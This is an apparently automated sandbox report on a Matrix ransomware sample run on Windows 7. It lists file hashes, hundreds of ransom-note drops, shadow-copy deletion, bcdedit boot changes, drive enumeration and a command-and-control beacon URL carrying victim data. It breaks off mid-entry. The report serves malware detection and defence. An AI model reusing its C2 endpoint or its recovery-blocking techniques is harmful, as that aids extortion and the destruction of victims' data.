Analysis
-
max time kernel
4294210s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
05/03/2022, 21:05
Static task
static1
Behavioral task
behavioral1
Sample
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
Resource
win10v2004-en-20220112
General
-
Target
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe
-
Size
2.6MB
-
MD5
bd90a796396be691b806fee34bdcc27b
-
SHA1
8477fdec639e673dfc586e7a37cb2049d0927601
-
SHA256
66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f
-
SHA512
96023528edacfe8afd923839a8e964e72387afa82ceab7f965cb4149375ca1aaff266d0b7213c697e1719786f466a4d27b201534055df0f11734bb632583bccc
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\Admin\Pictures\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Users\Admin\Documents\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe HTTP URL 3 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA|Admin&sid=b6dtRYWiPfbSrS4v&phase=START Process not Found File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Recovery\5e26de02-94e2-11ec-89d5-a6ba382fb892\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1988 bcdedit.exe 872 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1640 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS qKqhuGM064.exe -
Executes dropped EXE 3 IoCs
pid Process 1088 NW4cZ0HP.exe 1672 qKqhuGM0.exe 1616 qKqhuGM064.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\MergeExpand.tiff 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Users\Admin\Pictures\SplitSkip.tiff 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00070000000139f8-70.dat upx behavioral1/files/0x00070000000139f8-71.dat upx behavioral1/files/0x00070000000139f8-72.dat upx -
Loads dropped DLL 4 IoCs
pid Process 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 1636 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe 1556 cmd.exe 1672 qKqhuGM0.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 968 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: qKqhuGM064.exe File opened (read-only) \??\S: qKqhuGM064.exe File opened (read-only) \??\Z: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\T: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\J: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\F: qKqhuGM064.exe File opened (read-only) \??\K: qKqhuGM064.exe File opened (read-only) \??\M: qKqhuGM064.exe File opened (read-only) \??\Y: qKqhuGM064.exe File opened (read-only) \??\O: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\E: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\O: qKqhuGM064.exe File opened (read-only) \??\R: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\Q: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\I: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\H: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\E: qKqhuGM064.exe File opened (read-only) \??\P: qKqhuGM064.exe File opened (read-only) \??\W: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\G: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\X: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\F: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\H: qKqhuGM064.exe File opened (read-only) \??\I: qKqhuGM064.exe File opened (read-only) \??\U: qKqhuGM064.exe File opened (read-only) \??\V: qKqhuGM064.exe File opened (read-only) \??\N: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\M: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\A: qKqhuGM064.exe File opened (read-only) \??\B: qKqhuGM064.exe File opened (read-only) \??\G: qKqhuGM064.exe File opened (read-only) \??\R: qKqhuGM064.exe File opened (read-only) \??\X: qKqhuGM064.exe File opened (read-only) \??\Z: qKqhuGM064.exe File opened (read-only) \??\V: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\U: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\S: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\L: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\L: qKqhuGM064.exe File opened (read-only) \??\T: qKqhuGM064.exe File opened (read-only) \??\Y: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\P: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\K: 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened (read-only) \??\J: qKqhuGM064.exe File opened (read-only) \??\N: qKqhuGM064.exe File opened (read-only) \??\W: qKqhuGM064.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\kKslVIK6.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXT 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Casual.css 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADVZIP.DIC 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239967.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00916_.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL_K_COL.HXK 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL01395_.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02009_.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDIRMV.XML 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14580_.GIF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeFax.Dotx 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200279.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#FOX_README#.rtf 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html 66448fe45bdb015c87688470a2e98f1fdef839906a517a9c37da1d96b497b53f.exe File opened for modification C:\Program 